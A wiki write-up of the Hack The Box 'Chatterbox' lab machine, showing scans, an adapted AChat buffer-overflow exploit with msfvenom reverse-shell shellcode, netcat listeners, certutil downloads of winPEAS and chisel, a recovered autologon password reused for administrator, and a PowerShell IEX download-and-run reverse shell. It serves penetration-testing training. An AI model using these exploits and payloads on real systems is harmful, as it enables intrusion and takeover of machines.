Chatterbox

From Luniwiki
Jump to: navigation, search

Back

Chatterbox01.png

Port scan

u505@naos:~/HTB/Machines/Chatterbox$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.74

Starting masscan 1.0.5 at 2021-01-14 17:03:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 9255/tcp on 10.10.10.74 Discovered open port 9256/tcp on 10.10.10.74
u505@naos:~/HTB/Machines/Chatterbox$ nmap -sC -sV chatterbox
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:03 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.40 seconds
u505@naos:~/HTB/Machines/Chatterbox$ nmap -Pn -sC -sV chatterbox
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:03 EST
Nmap scan report for chatterbox (10.10.10.74)
Host is up.
All 1000 scanned ports on chatterbox (10.10.10.74) are filtered

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 201.74 seconds
u505@naos:~/HTB/Machines/Chatterbox$ nmap -Pn -p 9255,9256 -sC -sV chatterbox
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:07 EST
Nmap scan report for chatterbox (10.10.10.74)
Host is up (0.043s latency).

PORT STATE SERVICE VERSION 9255/tcp open http AChat chat system httpd |_http-server-header: AChat |_http-title: Site doesn't have a title. 9256/tcp open achat AChat chat system
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds

Achat buffer overflow

u505@naos:~/HTB/Machines/Chatterbox$ searchsploit achat
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow    | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (M | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Sc | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal            | php/webapps/24647.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Chatterbox$ searchsploit -m 36025
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Chatterbox/36025.py

Installing and running Achat v0.150 beta7 in a Windows 10 box, shows ports TCP 9255 9256 and UDP 9256

Test PoC in Windows 10 box

Chatterbox02.png

C:\Users\u505>tasklist /v  | findStr AChat
chrome.exe                    2916 RDP-Tcp#1                  3    141,960 K Running         WINDOWS10\u505                                          0:00:14 AChat download | SourceForge.net - Google Chrome
AChat.exe                     2784 RDP-Tcp#1                  3     23,496 K Running         WINDOWS10\u505                                          0:00:01 AChat v0.150 beta7

C:\Users\u505>netstat -ano | findStr 2784 TCP 192.168.76.21:9255 0.0.0.0:0 LISTENING 2784 TCP 192.168.76.21:9256 0.0.0.0:0 LISTENING 2784 UDP 192.168.76.21:9256 *:* 2784

Try of the buffer overflow.

u505@naos:~/HTB/Machines/Chatterbox$ cp 36025.py testw10_calc.py
u505@naos:~/HTB/Machines/Chatterbox$ diff testw10_calc.py 36025.py
57c57
< server_address = ('192.168.1.21', 9256)
---
> server_address = ('192.168.91.130', 9256)
78c78
< sock.close()
---
> sock.close()
\ No newline at end of file

Run the PoC, only updating the target IP

u505@naos:~/HTB/Machines/Chatterbox$ python testw10_calc.py
---->{P00F}!

Once the payload sent, the chat window showed a lot of Z, crashed and opened a calculator.

Chatterbox03.png

Test reverse shell on Windows 10

Modification of the msfvenom payload to create a reverse shell instead of a calc.exe

u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
...

Modification python

u505@naos:~/HTB/Machines/Chatterbox$ diff testw10_rev.py 36025.py
54,122d53
< #u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
< #Found 1 compatible encoders
< #Attempting to encode payload with 1 iterations of x86/unicode_mixed
< #x86/unicode_mixed succeeded with size 774 (iteration=0)
< #x86/unicode_mixed chosen with final size 774
< #Payload size: 774 bytes
< #Final size of python file: 3767 bytes
< buf =  b""
< buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
...
< buf += b"\x53\x69\x6f\x39\x45\x41\x41"
<
126c57
< server_address = ('192.168.1.21', 9256)
---
> server_address = ('192.168.91.130', 9256)
147c78
< sock.close()
---
> sock.close()
\ No newline at end of file

The payload size is 774 bytes, that is less than maximum size (1152 bytes) of the exploit.

u505@naos:~/HTB/Machines/Chatterbox$ tail -n 25 testw10_rev.py

# Create a UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) server_address = ('192.168.1.21', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) p += "\x62" + "A"*45 p += "\x61\x40" p += "\x2A\x46" p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" p += "\x61\x43" + "\x2A\x46" p += "\x2A" + fs + "C" * (157-len(fs)- 31-3) p += buf + "A" * (1152 - len(buf)) p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!" i=0 while i<len(p): if i > 172000: time.sleep(1.0) sent = sock.sendto(p[i:(i+8192)], server_address) i += sent sock.close()

Start listener.

u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Run the exploit.

u505@naos:~/HTB/Machines/Chatterbox$ python testw10_rev.py
---->{P00F}!

The reverse shell is opened.

u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.21.
Ncat: Connection from 192.168.1.21:58472.
Microsoft Windows [Version 10.0.19042.685]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami whoami windows10\u505

Again, the exploit crashes the chat program. That seems logical, but it needs to be taken under consideration.

Exploit the target

I modified the exploit with the target address and the msfvenom payload with the correct values.

u505@naos:~/HTB/Machines/Chatterbox$ grep 10.10 buf_achat.py
#u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
server_address = ('10.10.10.74', 9256)

Raised a listener.

u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And run the exploit.

u505@naos:~/HTB/Machines/Chatterbox$ python buf_achat.py
---->{P00F}!

And the reverse shell opens.

u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49191.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami whoami chatterbox\alfred

User flag

C:\Windows\system32>cd c:\Users\alfred\desktop
cd c:\Users\alfred\desktop

c:\Users\Alfred\Desktop>type user.txt type user.txt <USER_FLAG>

Privileges escalation

It is a Windows 7 with all hotfixes installed.

c:\Users\Alfred\Desktop>systeminfo
systeminfo

Host Name: CHATTERBOX OS Name: Microsoft Windows 7 Professional OS Version: 6.1.7601 Service Pack 1 Build 7601 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00371-222-9819843-86663 Original Install Date: 12/10/2017, 9:18:19 AM System Boot Time: 1/14/2021, 12:00:46 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 2 Processor(s) Installed. [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 1,541 MB Virtual Memory: Max Size: 4,095 MB Virtual Memory: Available: 3,436 MB Virtual Memory: In Use: 659 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: \\CHATTERBOX Hotfix(s): 183 Hotfix(s) Installed. [01]: KB2849697 [02]: KB2849696 ... [183]: KB4054518 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.74

winPEAS

Create the web server with the winPEAS executable.

u505@naos:~/HTB/Machines/Chatterbox$ mkdir web
u505@naos:~/HTB/Machines/Chatterbox$ cd web
u505@naos:~/HTB/Machines/Chatterbox/web$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/winPEAS/./winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe ./
u505@naos:~/HTB/Machines/Chatterbox/web$ sudo python -m SimpleHTTPServer 80     
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

Upload winPEAS to the target.

c:\Users\Alfred\Desktop>certutil -urlcache -split -f "http://10.10.14.7/winPEAS.exe" winPEAS.exe
certutil -urlcache -split -f "http://10.10.14.7/winPEAS.exe" winPEAS.exe
****  Online  ****
  000000  ...
  073400
CertUtil: -URLCache command completed successfully.

Run the enumeration.

c:\Users\Alfred\Desktop>winPEAS.exe
winPEAS.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
   Creating Dynamic lists, this could take a while, please wait...
   - Checking if domain...
...
 [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!
...

winPEAS found Alfred credentials. I confirm it querying winlogon keys in the registry.

c:\Users\Alfred\Desktop>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16} Userinit REG_SZ C:\Windows\system32\userinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 ShutdownWithoutLogon REG_SZ 0 WinStationsDisabled REG_SZ 0 DisableCAD REG_DWORD 0x1 scremoveoption REG_SZ 0 ShutdownFlags REG_DWORD 0x80000033 DefaultDomainName REG_SZ DefaultUserName REG_SZ Alfred AutoAdminLogon REG_SZ 1 DefaultPassword REG_SZ Welcome1!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked

Shell as administrator

We need to access the port 445 to perform a psexec. We need to create a tunnel from our box to the target.

First step Download chisel.

u505@naos:~/HTB/Machines/Chatterbox/web$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_windows_386.gz
u505@naos:~/HTB/Machines/Chatterbox/web$ gunzip chisel_1.7.4_windows_386.gz

Upload chisel to the target.

c:\Users\Alfred\Desktop>certutil -urlcache -split -f "http://10.10.14.7/chisel_1.7.4_windows_386" chisel.exe
certutil -urlcache -split -f "http://10.10.14.7/chisel_1.7.4_windows_386" chisel.exe
****  Online  ****
 000000  ...
 724e00
CertUtil: -URLCache command completed successfully.

Run chisel server on our box. Because the port 445 is less than 1024, we need to run it as root.

u505@naos:~/HTB/Machines/Chatterbox$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz
u505@naos:~/HTB/Machines/Chatterbox$ gunzip chisel_1.7.4_linux_amd64.gz
u505@naos:~/HTB/Machines/Chatterbox$ chmod +x chisel_1.7.4_linux_amd64
u505@naos:~/HTB/Machines/Chatterbox$ sudo ./chisel_1.7.4_linux_amd64 server --reverse --port 4445
[sudo] password for u505:
2021/01/14 14:33:55 server: Reverse tunnelling enabled
2021/01/14 14:33:55 server: Fingerprint KtsgB5aG+gCbCLsd2GVsizSCQg4gNCYDT0mfdac7R74=
2021/01/14 14:33:55 server: Listening on http://0.0.0.0:4445

Run chisel client from the target. We use start /b to run in background and avoid loosing access to the console.

c:\Users\Alfred\Desktop>start /b chisel.exe client 10.10.14.7:4445 R:445:127.0.0.1:445
2021/01/15 01:38:05 client: Connecting to ws://10.10.14.7:4445
2021/01/15 01:38:15 client: Connected (Latency 40.0023ms)

We confirm that user alfred is owned.

u505@naos:~/HTB/Machines/Chatterbox$ crackmapexec smb 127.0.0.1/32 -u alfred -p 'Welcome1!'
SMB         127.0.0.1       445    CHATTERBOX       [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB         127.0.0.1       445    CHATTERBOX       [+] Chatterbox\alfred:Welcome1!

And the password of the user administrator is the same.

u505@naos:~/HTB/Machines/Chatterbox$ crackmapexec smb 127.0.0.1/32 -u administrator -p 'Welcome1!'
SMB         127.0.0.1       445    CHATTERBOX       [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB         127.0.0.1       445    CHATTERBOX       [+] Chatterbox\administrator:Welcome1! (Pwn3d!)

A psexec to access the machine.

u505@naos:~/HTB/Machines/Chatterbox$ python3 /opt/utils/impacket/examples/psexec.py administrator@127.0.0.1
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: [*] Requesting shares on 127.0.0.1..... [*] Found writable share ADMIN$ [*] Uploading file DCTXVrZo.exe [*] Opening SVCManager on 127.0.0.1..... [*] Creating service CMKA on 127.0.0.1..... [*] Starting service CMKA..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami nt authority\system C:\Windows\system32>type c:\users\administrator\desktop\root.txt b'Access is denied.\r\n' C:\Users\Administrator\Desktop>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 5 [*] Opening SVCManager on 127.0.0.1..... [*] Stopping service rbpD..... [*] Removing service rbpD..... [*] Removing file tDvADwgE.exe.....

This was unexpected. The user system doesn't have rights over the file. We need to log as administrator directly. We copy nishang reverse powershell.

u505@naos:~/HTB/Machines/Chatterbox/web$ cp /usr/share/windows-resources/nishang/Shells/Invoke-PowerShellTcp.ps1 ./
u505@naos:~/HTB/Machines/Chatterbox/web$ mv Invoke-PowerShellTcp.ps1 RevAdmin4446.ps1

At the end of the script we add the reverse shell.

u505@naos:~/HTB/Machines/Chatterbox/web$ vi RevAdmin4446.ps1
u505@naos:~/HTB/Machines/Chatterbox/web$ tail -n 5 RevAdmin4446.ps1
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 4446

We create a second script to call our previous script (RevAdmin4446.ps1) but with the administrator credentials.

u505@naos:~/HTB/Machines/Chatterbox/web$ vi cred.ps1
u505@naos:~/HTB/Machines/Chatterbox/web$ cat cred.ps1
$pass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$pass)
start-Process -FilePath "powershell"  -ArgumentList "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/RevAdmin4446.ps1')" -Credential $cred

Raise a listener on port 4446.

u505@naos:~/HTB/Machines/Chatterbox/web$ rlwrap nc -lnvp 4446
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446

Call the cred.ps1 script from our user Alfred.

c:\Users\Alfred\Desktop>start /b powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/cred.ps1')"
start /b powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/cred.ps1')"

The reverse shell is opened as administrator.

u505@naos:~/HTB/Machines/Chatterbox/web$ rlwrap nc -lnvp 4446
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49169.
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Alfred\Desktop> whoami whoami chatterbox\administrator PS C:\Users\Alfred\Desktop>type c:\users\administrator\desktop\root.txt <ROOT_FLAG>

Alternative change root.txt rights

I noticed while trying to change the rights of the file root.txt with the user System, that user Alfred had rights on the Adminstrator's Desktop folder. This method allows us to read the file root.txt, but the box is not owned.

c:\Users\Alfred\Desktop>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop

Alfred has access to the folder Desktop.

c:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.

But not on the file root.txt

c:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)

Alfred can also list the rghts of the file root.txt

Successfully processed 1 files; Failed processing 0 files

Alfred appears to have full control of the folder, and inherited objects (but system had too, and it failed).

c:\Users\Administrator\Desktop>icacls c:\Users\Administrator\Desktop
icacls c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

Provide full access to the file to alfred.

c:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F
icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

Alfred has now full access.

c:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Alfred:(F)
         CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

The flag is readable.

c:\Users\Administrator\Desktop>type root.txt
type root.txt
<ROOT_FLAG>

Alfred is the owner of the file.

c:\Users\Administrator\Desktop>dir /q root.txt
dir /q root.txt
Volume in drive C has no label.
Volume Serial Number is 9034-6528

Directory of c:\Users\Administrator\Desktop
01/15/2021 02:03 AM 34 CHATTERBOX\Alfred root.txt 1 File(s) 34 bytes 0 Dir(s) 19,466,502,144 bytes free

References

Daniel Simao 23:35, 14 January 2021 (EST)